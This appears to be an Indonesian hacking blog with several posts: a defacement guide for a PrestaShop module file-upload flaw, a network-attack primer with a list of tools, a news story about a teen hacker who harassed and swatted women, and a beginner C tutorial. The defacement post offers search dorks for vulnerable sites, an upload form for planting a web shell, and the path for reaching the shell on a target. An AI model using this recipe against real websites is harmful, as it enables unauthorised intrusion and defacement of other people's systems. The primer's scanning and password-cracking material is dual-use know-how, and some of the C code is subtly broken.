Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

3

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

mp3 Player

Efek klik kanan

Kamis, 30 Juni 2016

Deface Warehouse Prestashop Arbitrary File Upload

Dork : inurl:/modules/columnadverts/
       inurl://modules/simpleslideshow/
       inurl://modules/homepageadvertise/
       inurl://modules/productpageadverts/

CSRF :
<form method="POST" action="site/path"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

Kalo ada Tulisan "Eror" Brarti Vuln !

Upload shell di CSRF :v
Akses shell ?? Use Your Brain :)
Tenang di kasih tau kok : http://targetsuka.co.li/[path]/modules/columnadverts/slides/namashell

Rabu, 29 Juni 2016

Attack a Network

Sumber Millw0rm
Ways To Attack a Network:
Ping
The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name. PING stands for “Packet Internet Groper” and is delivered with practically every
Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses
ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP
Echo reply packets.
All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping <ip address or hostname>
(For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.

Ping Sweep
If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org) also contains an option
to perform ping sweeps.
Tracert:
Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure below.
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.
Go to DOS prompt and type tracert <destination address>
(For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute

Port Scanning:-
After you have determined that your target system is alive the next important step would be to perform a port scan on the target system.
There are a wide range of port scanners available for free. But many of them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.


Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running,
firewalls being used and a lot more.
Common ports:
Below is a list of some common ports and the respective services
running on the ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
Besides the above ports they are even some ports known as Trojan
ports used by Trojans that allow remote access to that system.

Vulnerability Scanning:
Every operating system or the services will have some vulnerabilities due to the
programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is
an excellent mailing list discussing the vulnerabilities in the various system. The
exploit code writers write exploit codes to exploit these vulnerabilities existing in a system.
There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.
Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com vulnerabilities and exploit codes of various
operating systems. Packet storm security
(http://www.packetstormsecurity.com) is also a nice pick.

Tools Descriptions:
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (Network Mapper) is a free open source utility for network exploration
or security auditing. It was designed to rapidly scan large networks, although
it works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use,
and dozens of other characteristics. Nmap runs on most types of computers and
both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (packet_trace). A very
versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-
server framework.
Nessus is the worlds most popular vulnerability scanner used in over 75,000
organizations world-wide. Many of the worlds largest organizations are
realizing significant cost savings by using Nessus to audit business-critical
enterprise devices and applications.

3. John the Ripper
Yes, JTR 1.7 was recently released!
John the Ripper is a fast password cracker, currently available for many
flavors of Unix (11 are officially supported, not counting different
architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect
weak Unix passwords. Besides several crypt(3) password hash types most commonly
found on various Unix flavors, supported out of the box are Kerberos AFS and
Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here - http://www.openwall.com/john/

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 3200 potentially
dangerous files/CGIs, versions on over 625 servers, and version specific
problems on over 230 servers. Scan items and plugins are frequently updated and
can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto
(focus on http fingerprinting or Google hacking/info gathering etc, another
article for just those).

5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the
highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I
suggest you check this out, it’s pretty nice.
Get SuperScan Here - http://www.foundstone.com/index.htm
subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan4.htm

6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the
operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY
active connections to the target machine.

7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you
capture and interactively browse the contents of network frames. The goal of
the project is to create a commercial-quality analyzer for Unix and to give
Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can
reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here - http://www.wireshark.org/

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in
different Layer 2 protocols. It pretends to be a solid framework for analyzing
and testing the deployed networks and systems. Currently, the following network
protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery
Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration
Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch
Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to
completely remove sensitive data from your hard drive by overwriting it several
times with carefully selected patterns. Works with Windows 95, 98, ME, NT,
2000, XP and DOS. Eraser is Free software and its source code is released under
GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make
sure it’s really gone, you don’t want it hanging around to bite you in the ass.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms,
along with an xterm terminal emulator. A must have for any h4. 0r wanting to
telnet or SSH from Windows without having to use the crappy default MS command
line clients.

11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in
Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute
force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack
article.

12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network,
cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis
attacks, recording VoIP conversations, decoding scrambled passwords, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
The program does not exploit any software vulnerabilities or bugs that could
not be fixed with little effort.
Get Cain and Abel Here - http://www.oxid.it/cain.html

13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion
detection system. Kismet will work with any wireless card which supports raw
monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco
gold).

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux
counterparts, but it’s easy to use and has a nice interface, good for the
basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized rogue access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here - http://www.stumbler.net/
15. Hping
To finish off, something a little more advanced if you want to test your TCP/IP
packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping unix command, but hping isn’t only able to
send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a
traceroute mode, the ability to send files between a covered channel, and many
other features.
Get hping Here - http://www.hping.org/

Exploit

A tool developed by hackers that is used to perform malicious attacks on computer systems. They are usually scripts that are designed to exploit weaknessness in software over a network, most commonly the Internet. Zero-Day is a common type of exploit.


Zero-Day Exploits
Called either Day Zero or Zero-Day, it is an exploit that takes advantage of a security vulnerability on the same day that the vulnerability becomes publicly or generally known. Zero-Day exploits are usually posted by well-known hacker groups. Software companies may issue a security bulletin or advisory when the exploit becomes known, but companies may not be able to offer a patch to fix the vulnerability for some time after.

An exploit (from the same word in the French language, meaning "achievement", or "accomplishment") is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerised). This frequently includes such things as gaining control of a computer system or allowing privilege escalation or a denial of service attack.

There are several methods of classifying exploits. The most common is by how the exploit contacts the vulnerable software. A 'remote exploit' works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A 'local exploit' requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usually consisting of modified servers that send an exploit if accessed with client application. Exploits against client applications may also require some interaction with the user and thus may be used in combination with social engineering method. This is the hacker way of getting into computers and websites for stealing data.

In computing, an exploit is an attack on a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders. Used as a verb, the term refers to the act of successfully making such an attack.

In Exploit another classification is by the action against vulnerable system: unauthorized data access, arbitrary code execution, denial of service.

Many crackers (or hackers, if you prefer that term) take pride in keeping tabs of such exploits and post their exploits (and discovered vulnerabilities) on a Web site to share with others.

Where an exploit takes advantage of a weakness in an operating system or vended application program, the owners of the system or application issue a "fix" or patch in response. Users of the system or application are responsible for obtaining the patch, which can usually be downloaded from the Web. Failure to install a patch for a given problem exposes the user to a security breach. (However, it can be difficult to keep up with all the required patches.)

Many exploits are designed to provide superuser-level access to a computer system. However, it is also possible to use several exploits, first to gain low-level access, then to escalate privileges repeatedly until one reaches root.

Normally a single exploit can only take advantage of a specific software vulnerability. Often, when an exploit is published, the vulnerability is fixed through a patch and the exploit becomes obsolete for newer versions of the software. This is the reason why some blackhat hackers do not publish their exploits but keep them private to themselves or other crackers. Such exploits are referred to as 'zero day exploits' and to obtain access to such exploits is the primary desire of unskilled attackers, often nicknamed script kiddies.

Script Kiddie

A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability.
The vast majority of the "hacker" underground is made up of people who have only been using computers for a few years and who really know comparatively little about them. These are people, usually kids, who are attracted by the seemingly magical powers that hacking gives them. Since they know so little about computers, they don't really known how to hack themselves but instead follow recipes or "scripts" developed by real hackers. Most of these scripts are easy-to-use programs whereby the "script-kiddy" simply enters the IP address of the victim.
One of the distinguishing features of script-kiddies is that they must have a lot of patience. Because security holes are quickly found and repaired, most systems will resist most attacks. Therefore, if the script-kiddy is targeting a single system, they have to find a lot of scripts to try against the system before they find one that works. More commonly, the script-kiddies downloads one of the most recently developed scripts and proceeds to run it against targets all throughout the Internet until they find someone who is vulnerable to that specific script.
You can get update exploits from www.1337day.com

Sumber :Millw0rm

 Offical web : www.Millw0rm.cn

Jumat, 24 Juni 2016

Ditolak cewek , Ini Cara Hacker Balas Dendam

annindohacktivist.blogspot.co.id - Seorang hacker muda ditangkap karena telah melakukan kejahatan terhadap beberapa orang wanita. Hacker ini baru berusia 17 tahun dan dia menargetkan aksinya pada wanita muda pemain game komputer.

Remaja, yang namanya tidak diungkap karena masih berusia muda, divonis bersalah atas 23 tuduhan pemerasan, kenakalan publik, laporan palsu ke polisi dan pelecehan. Dia melakukan ini semua hanya untuk membalas dendam ke wanita-wanita muda yang menolak ajakan dirinya bergabung dalam permainan video popular, League of Legends.

Dilansir melalui Business Insider, Selasa 26 Mei 2015, remaja yang berasal dari British Columbia, Kanada, itu meretas jaringan komputer yang digunakan wanita-wanita yang menolaknya. Tidak hanya mematikan akses internet, dia juga mengancam mengunggah informasi pribadi gadis-gadis gamer itu di dunia maya.

Hacker muda ini memang tergolong iseng yang berujung bui. Dia pernah membuat laporan palsu ke kepolisian melalui telepon. Suatu ketika dia pernah menelepon polisi dan mengatakan jika ia telah membunuh seseorang, memegang bom di tangannya, dan meminta tebusan. Hebatnya, laporan palsu ini mengarahkan polisi agar bergegas menuju rumah gadis korban yang ia kerjai. Aksi ini memang cukup populer di komunitas game. Dikenal dengan nama 'Swatting'.

Pelecehan yang dilakukan hacker itu tidak hanya berhenti di situ. Dia bahkan pernah mengunggah informasi kartu kredit milik orang tua korban, mengirimkan 218 pesan singkat bertubi-tubi, serta meretas akun email dan Twitter para korban.

Teror dunia maya yang dilakukan si hacker berakhir setelah ia memposting video streaming selama delapan jam di Youtube. Dengan menggunakan nama akun 'obnoxious' dan 'internetjesusob', dia memperlihatkan cara mengerjai dan melecehkan korbannya yang ada di Ohio. Semua pengguna internet yang berkunjung ke video streamingnya itu langsung melapor ke polisi.

Remaja ini ternyata menjadi incaran pihak keamanan Kanada sejak lama untuk kejahatan serupa. Dia dikenal sebagai anggota peretas Lizard Squad, yang pernah membobol Xbox Live dan jaringan PlayStation di 2014.

Setelah peretas mudah ini ditangkap, kepolisian menemukan banyak kasus lain yang ternyata dilakukan olehnya, termasuk ancaman bom di Disneyland pada 2013.

Sumber : http://www.exhacking.net/

Rabu, 22 Juni 2016

Belajar Bahasa C





Learn C Cahya ganteng :v


################################################

Bahasa merupakan salah satu yang terpenting untuk berkomunikasi!, bayangkan jika anda bisa berdialog dengan komputer asik juga bukan ? nah berikut ini penulis akan membahas sedikit gimana cara berkomunikasi dengan komputer dengan bahasa pemprograman bahasa tingkat Tinggi yaitu Bahasa C selaku bahasa Tingkat tinggi,dasar pemprograman yang banyak dikembangkan sampai jaman sekarang ini, C telah banyak membantu perkembangan Bahasa komputer sebagai contoh banyak software canggih yang telah dilahirkannya seperti Keluarga Linux. terlalu panjang untuk dijabarkan disini!


oke kita mulai Belajar C dari tingkat dasar !

BAB I :

Bentuk dasar :
-------------
void main(){
//disini badan program diproses
}

#include
int main()
{
printf("Cahya lagi Nembak Pake sniffer\n");
return 0;
}

Hasil keluarannya tampak dimonitor anda:
----------------------------------------
Cahya  lagi Nembak Pake sniffer

Perhatikan :

#include <--- #include untuk membuka file header/library file stdio.h yang dibutuhkan oleh fungsi printf (kita harus sertakan)

int main() { <--- ini adalah fungsi utama pada saat program dijalankan
<--- pada saat kita mengcompile suatu program selalu fungsi ini yang dijalankan
printf(" test \n"); <--- fungsinya untuk mencetak text kelayar , \n artinya turun baris

return 1; <--- nilai yang dikembalikan oleh fungsi utama bernilai true
}

note
tanda { = pembuka
} = penutup

1 : true
0 : false


Apakah anda bisa membayangkan hasil dari source code ini..
--------------------------------------------------------
int main()
{
printf("./RobinMasterGrayFox\n");
printf("----------\n");
printf("Renjana Administrator\n");
printf("Komunity Millw0rm Crew");
return 0;
}

Bermain dengan tipe data :
------------------------
Apakah tipe data itu ?
Tipe data adalah jenis tipe dari suatu variable
contoh : abc ->> merupakan string
a ->> merupakan character
1,2,3,... ->> merupakan bilangan integer
1.001 ->> merupakan bilangan desimal (berkoma)
dll

nah didalam bahasa C terdapat tipe-tipe data yang menampung sesuai dengan data anda. Ada pun tipe data tersebut adalah sebagai berikut :

Type ³ Length ³ Range
------------------------------------------------------------------
unsigned char ³ 8 bits ³ 0 to 255
char ³ 8 bits ³ -128 to 127
enum ³ 16 bits ³ -32,768 to 32,767
unsigned int ³ 16 bits ³ 0 to 65,535
short int ³ 16 bits ³ -32,768 to 32,767
int ³ 16 bits ³ -32,768 to 32,767
unsigned long ³ 32 bits ³ 0 to 4,294,967,295
long ³ 32 bits ³ -2,147,483,648 to 2,147,483,647
float ³ 32 bits ³ 3.4 * (10**-38) to 3.4 * (10**+38)
double ³ 64 bits ³ 1.7 * (10**-308) to 1.7 * (10**+308)
long double ³ 80 bits ³ 3.4 * (10**-4932) to 1.1 * (10**+4932)

nah kira-kira jenis tipe data apa yang kita gunakan , itu tergantung dari kebutuhan saat kita membuat program!

contoh pemakaian sebagai berikut :
--------------------------------
Bermain dengan tipe data
#include
int main()
{
int angka; // int = tipe data , angka = merupakan variabel penampung
angka=1;
printf("nilai dari angka : %d\n", angka);
angka=5;
printf("nilai dari angka : %d\n", angka);
angka=-8;
printf("nilai dari angka : %d\n", angka);
return 0;
}

contoh lain :
------------
#include
int main()
{
int a = 2;
float x = 17.1, y = 8.95, z;
char c;

c = (char)a + (char)x;
c = (char)(a + (int)x);
c = (char)(a + x);
c = a + x;

z = (float)((int)x * (int)y);
z = (float)((int)(x * y));
z = x * y;
return 0;
}
note : tanda // artinya komentar yang anda sisipkan jika hanya untuk satu baris jika lebih anda bisa mengunakan

seperti ini :
/*
komentarnya disini
*/

Apa yang terdapat dalam tanda itu tidak akan dieksekusi (dijalankan/running) oke!, gimana sekarang tidak terlalu sulit bukan? :p

Program mengenal tipe data
--------------------------
#include
int main()
{
int a; /* simple integer type */
long int b; /* long integer type */
short int c; /* short integer type */
unsigned int d; /* unsigned integer type */
char e; /* character type */
float f; /* floating point type */
double g; /* double precision floating point */

a = 1023;
b = 2222;
c = 123;
d = 1234;
e = 'X';
f = 3.14159;
g = 3.1415926535898;

printf("a = %d\n", a); /* decimal output */
printf("a = %o\n", a); /* octal output */
printf("a = %x\n", a); /* hexadecimal output */
printf("b = %ld\n", b); /* decimal long output */
printf("c = %d\n", c); /* decimal short output */
printf("d = %u\n", d); /* unsigned output */
printf("e = %c\n", e); /* character output */
printf("f = %f\n", f); /* floating output */
printf("g = %f\n", g); /* double float output */

printf("\n");
printf("a = %d\n", a); /* simple int output */
printf("a = %7d\n", a); /* use a field width of 7 */
printf("a = %-7d\n", a); /* left justify in field of 7 */

c = 5;
d = 8;
printf("a = %*d\n", c, a); /* use a field width of 5 */
printf("a = %*d\n", d, a); /* use a field width of 8 */

printf("\n");
printf("f = %f\n", f); /* simple float output */
printf("f = %12f\n", f); /* use field width of 12 */
printf("f = %12.3f\n", f); /* use 3 decimal places */
printf("f = %12.5f\n", f); /* use 5 decimal places */
printf("f = %-12.5f\n", f); /* left justify in field */
return 0;
}


PERHATIKAN TABLE berikut ini
# Category ³ Operator ³ What it is (or does)
---------------------------------------------------------------------------
1. Highest ³ () ³ Function call
³ [] ³ Array subscript
³ -> ³ C++ indirect component selector
³ :: ³ C++ scope access/resolution
³ . ³ C++ direct component selector
---------------------------------------------------------------------------
2. Unary ³ ! ³ Logical negation (NOT)
³ ~ ³ Bitwise (1's) complement
³ + ³ Unary plus
³ - ³ Unary minus
³ ++ ³ Preincrement or postincrement
³ -- ³ Predecrement or postdecrement
³ & ³ Address
³ * ³ Indirection
³ sizeof ³ (returns size of operand, in bytes)
³ new ³ (dynamically allocates C++ storage)
³ delete ³ (dynamically deallocates C++ storage)
---------------------------------------------------------------------------
3. Multipli- ³ * ³ Multiply
cative ³ / ³ Divide
³ % ³ Remainder (modulus)
---------------------------------------------------------------------------
4. Member ³ .* ³ C++ dereference
access ³ ->* ³ C++ dereference
---------------------------------------------------------------------------
5. Additive ³ + ³ Binary plus
³ - ³ Binary minus
---------------------------------------------------------------------------
6. Shift ³ << ³ Shift left
³ >> ³ Shift right
---------------------------------------------------------------------------
7. Relational ³ < ³ Less than
³ <= ³ Less than or equal to
³ > ³ Greater than
³ >= ³ Greater than or equal to
---------------------------------------------------------------------------
8. Equality ³ == ³ Equal to
³ != ³ Not equal to
---------------------------------------------------------------------------
9. ³ & ³ Bitwise AND
---------------------------------------------------------------------------
10. ³ ^ ³ Bitwise XOR
---------------------------------------------------------------------------
11. ³ | ³ Bitwise OR
---------------------------------------------------------------------------
12. ³ && ³ Logical AND
---------------------------------------------------------------------------
13. ³ || ³ Logical OR
---------------------------------------------------------------------------
14. Conditional³ ?: ³ (a ? x : y means "if a then x, else y")
---------------------------------------------------------------------------
15. Assignment ³ = ³ Simple assignment
³ *= ³ Assign product
³ /= ³ Assign quotient
³ %= ³ Assign remainder (modulus)
³ += ³ Assign sum
³ -= ³ Assign difference
³ &= ³ Assign bitwise AND
³ ^= ³ Assign bitwise XOR
³ |= ³ Assign bitwise OR
³ <<= ³ Assign left shift
³ >>= ³ Assign right shift
---------------------------------------------------------------------------
16. Comma ³ , ³ Evaluate
---------------------------------------------------------------------------

contoh programnya
-----------------
#include
int main()
{
char mask;
char number[6];
char and, or, xor, inv, index;

number[0] = 0X00;
number[1] = 0X11;
number[2] = 0X22;
number[3] = 0X44;
number[4] = 0X88;
number[5] = 0XFF;

printf(" nmbr mask and or xor inv\n");
mask = 0X0F;
for (index = 0 ; index <= 5 ; index++)
{
and = mask & number[index];
or = mask | number[index];
xor = mask ^ number[index];
inv = ~number[index];
printf("%5x %5x %5x %5x %5x %5x\n",
number[index], mask, and, or, xor, inv);
}

printf("\n");
mask = 0X22;
for (index = 0 ; index <= 5 ; index++)
{
and = mask & number[index];
or = mask | number[index];
xor = mask ^ number[index];
inv = ~number[index];
printf("%5x %5x %5x %5x %5x %5x\n",
number[index], mask, and, or, xor, inv);
}

return 0;
}

BAB II : Perulangan

Terkadang sangat melelahkan jika kita mencetak sebuah kata "hello world " sebanyak 1000 kali dengan adanya perulangan semua jadi simple! macam-macam perulangan yang terdapat pada Bahaca c :
1.for
2.while
3.do-while

contoh pemakaian sebagai berikut :
--------------------------------
1. for (awal ;kondisi ;akhir)
{

}

Perhatikan soure code dibawah ini

contoh :
#include
int main()
{
int angka;
for(angka = 0 ; angka < 1000 ; angka = angka + 1)
printf("Cahya  ganteng lo\n");
return 0;
}
/* Outputnya : mencetak Cahya  ganteng sebanyak seribu kali (perhatikan kondisinya)
Jika bernilai True (benar) maka statement didalam { } akan dijalankan
Jika bernilai False kondisi didalam perulangan tidak akan dijalankan
*/

2.while

contoh pemakaian sebagai berikut :
--------------------------------
awal =0;
while (kondisi) {
awal=awal+1; /// variabel awal akan bertambah sesuai dengan dengan kondisi didalam = while(kondisi)
}

contoh :
#include
int main()
{
int index;

index = 0;
while (index < 10)
{
printf("mr.Udien\n");
index = index + 1;
}

return 0;
}

3.do-while

contoh pemakaian sebagai berikut :
--------------------------------
awal =0;
do{
awal=awal+1
}while(kondisi)


contoh :
#include
int main()
{
int index;

index = 0;
do
{
printf("Cahya\n");
index = index + 1;
} while (index < 10);

return 0;
}

note :
awal=awal+1; /// dapat ditulis dengan awal+=1; (ini sama saja artinya)

nilai awal selalu ditambah dengan angka satu, contoh :

int main()
{
int x = 0, y = 2, z = 1025;
float a = 0.0, b = 3.14159, c = -37.234;
x = x + 1;
x++;
++x;
z = y++;
z = ++y;

y = y - 1;
y--;
--y;
y = 3;
z = y--;
z = --y;


a = a + 12;
a += 12;
a *= 3.2;
a -= b;
a /= 10.0;

a = (b >= 3.0 ? 2.0 : 10.5 );
if (b >= 3.0)
a = 2.0;
else
a = 10.5;

c = (a > b ? a : b);
c = (a > b ? b : a);

return 0;
}

Gimana dengan konstanta suatu nilai :
kita dapat menggunakan #DEFINE

Contoh :

#define START 0
#define ENDING 9
#define MAX(A,B) ((A)>(B)?(A):(B))
#define MIN(A,B) ((A)>(B)?(B):(A))
int main()
{
int index, mn, mx;
int count = 5;

for (index = START ; index <= ENDING ; index++)
{
mx = MAX(index, count);
mn = MIN(index, count);
printf("Max is %d and min is %d\n", mx, mn);
}

return 0;
}


BAB III : Kondisi

Kondisi sangat perlu sebagai pembatas atau pengecekan suatu nilai, ada 2 bentuk penulisan kondisi :
1. if
2. switch -case

1. if(kondisi) {

}

if(kondisi ){
}else{
if(kondisi){

}else{

}
}

contoh pemakaian sebagai berikut :
--------------------------------
a = 4;
if (a < 2 ) // apakah a lebih besar dari 4

if (a < 2 ) { // apakah a lebih besar dari 4
//akan mengeksekusi didalam sini
}

if (a < 2 ) { // apakah a lebih besar dari 4

//akan mengeksekusi didalam sini Jika kondisinya berlaku benar
}else{ //selain itu
//akan mengeksekusi didalam sini jika Kondisinya berlaku salah

}

1. switch-case

contoh pemakaian sebagai berikut :
--------------------------------
awal = 4;
swicth(awal){
case '1' : printf("ini angka 1"); break;
case '2' : printf("ini angka 2"); break;
case '3' : printf("ini angka 3"); break;
case '4' : printf("ini angka 4"); break;
default : printf("angka tersebut tidak ada");
}

perhatikan source diatas
pertama kali awal=4
sewaktu masuk kedalam kondisi swith(kondisi)
apakah 4 termasuk didalam switch
jika terdapat maka baris : printf("ini angka 4"); //akan dijalankan
jika tidak terdapat maka akan lompat ke default : printf("angka tersebut tidak ada");

coba sekarang anda rubah awal =1;
apa yang terjadi ? // pikirkan sendiri :p

Contoh lain:
operand =ADD;
switch (operand) {
case MULTIPLY: x *= y; break;
case DIVIDE: x /= y; break;
case ADD: x += y; break;
case SUBTRACT: x -= y; break;
case INCREMENT2: x++;
case INCREMENT1: x++; break;
case EXPONENT:
case ROOT:
case MOD: printf("Not done\n"); break;
default: printf("Bug!\n");

exit(1);
}


contoh kombinasinya :
-------------------
#include
int main()
{
int index;

for(index = 1 ; index < 101 ; index = index + 1)
{
if ((index >= 32) && (index <= 39))
printf("%5d\n", index);
}

return 0;
}

atau bentuk begini
#include
int main()
{
int index;

index = 1;
do
{
printf("nilai sekarang %2d",index);
if (index == 3)
printf(" ini sama dengan 3.");
if (index == 7)
printf(" ini sama dengan 7.");
printf("\n");
index = index + 1;
} while (index < 11);

return 0;
}

----- pikirkan kembali bentuk seperti dibawah ini ----------------
#include
#define OPTION_1 /* This defines the preprocessor control */
#define PRINT_DATA /* If this is defined, we will print */
#ifndef OPTION_1
int count_1 = 17; /* This exists if OPTION_1 is not defined */
#endif
int main()
{
int index;
#ifndef PRINT_DATA
printf("No results will be printed with this version of "
" the program IFNDEF.C\n");
#endif
for (index = 0 ; index < 6 ; index++)
{
#ifdef PRINT_DATA
printf("In the loop, index = %d", index);
#ifndef OPTION_1
printf(" count_1 = %d", count_1); /* This may be printed */
#endif
printf("\n");
#endif
}

return 0;
}

// apakah anda bisa membayangkannya ? apa maksud dari #ifndef - #endif
?

contoh Mengenal enum


contoh pemakaian sebagai berikut :
--------------------------------
#include
int main()
{
enum {WIN, TIE, BYE, LOSE, NO_SHOW} result;
enum {SUN, MON, TUE, WED, THU, FRI, SAT} days;

result = WIN;
printf(" WIN = %d\n", result);
result = LOSE;
printf(" LOSE = %d\n", result);
result = TIE;
printf(" TIE = %d\n", result);
result = BYE;
printf(" BYE = %d\n", result);
result = NO_SHOW;
printf("NO_SHOW = %d\n\n", result);

for(days = MON ; days < FRI ; days++)
printf("The day code is %d\n", days);

return 0;
}


BAB IV : fungsi

Bayangkan jika program anda sekarang dalam baris yang sangat panjang, merepotkan sekali bukan nah dengan fungsi kita dapat menyederhakan sebuah program menjadi jelas dan mudah di baca

okeh.. kita mulai lagi.
contoh pemakaian sebagai berikut :
--------------------------------
#include
void writename(); // ini sebuah fungsi
void writename() // ini sebuah fungsi bernama writename()
{
printf("Cahya\n");
}

int main()
{
int index;

for(index = 0 ; index < 10 ; index = index + 1)
writename(); // panggil fungi yang bernama writename();
return 0;
}

contoh lain ;

#include

int tempcalc(int centtemp);

int main()
{
int count;
int farenheit; /* temperature farenheit */
int centigrade; /* temperature centigrade */

printf("Table Farenheit temperature \n\n");
for(count = -2 ; count <= 12 ; count = count + 1)
{
centigrade = 10 * count;
farenheit = tempcalc(centigrade);
printf(" C =%4d F =%4d ", centigrade, farenheit);
if (centigrade == 0)
printf(" Freezing point of water");
if (centigrade == 100)
printf(" Boiling point of water");
printf("\n");
} /* akhir dari perulangan*/

return 0;
}

